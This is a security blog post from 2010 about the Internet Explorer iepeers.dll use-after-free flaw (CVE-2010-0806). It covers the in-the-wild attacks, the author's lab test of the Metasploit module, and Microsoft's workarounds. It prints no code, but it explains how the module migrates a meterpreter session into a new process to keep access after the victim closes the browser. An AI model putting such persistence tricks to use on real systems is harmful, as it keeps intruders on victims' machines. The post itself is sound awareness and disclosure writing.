Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!

Tag Archives: cve-2010-0806

Internet Explorer iepeers.dll use-after-free

A few days back (9th March 2010), Microsoft confirmed the presence of an (as yet) un-patched vulnerability in Internet Explorer 6 and 7. McAffee also released information regarding targeted attacks discovered in the wild actively using this exploit. Since then, full information about the vulnerability and proof of concept code has been publicly released. As usual, the great guys behind Metasploit have a working exploit courtesy of Trancer at http://www.rec-sec.com.

After fighting with my VMWare install under Ubuntu 10.04 (yes, I know…. it’s Alpha, why is that on your main box!!!) last night after the release, I finally got a chance to play a little with the exploit today in a test environment. As you can imagine the exploit is simple to use and works like a charm (at least in the testing I’ve done). I’ve put together a quick video of the exploit for those that want to show their management types why this is such a serious issue.

I particularly like the addition of the migrate -f automatically into the exploit (see ‘show advanced’). This spawns a new notepad process and migrates to it so that if the victim closes/kills IE, the meterpreter session won’t be automatically killed along with the process. You learn something new everyday!

Microsoft have now posted a number of workarounds (most centered around disabling or limiting access to the peer class). For more information checkout KB981374 and CVE-2010-0806

All credit for the exploit goes to Tracer, All credit to HD Moore and the Metasploit team for producing such a great tool, for people like me (another tool), to rely on so much.

Keep up the good work.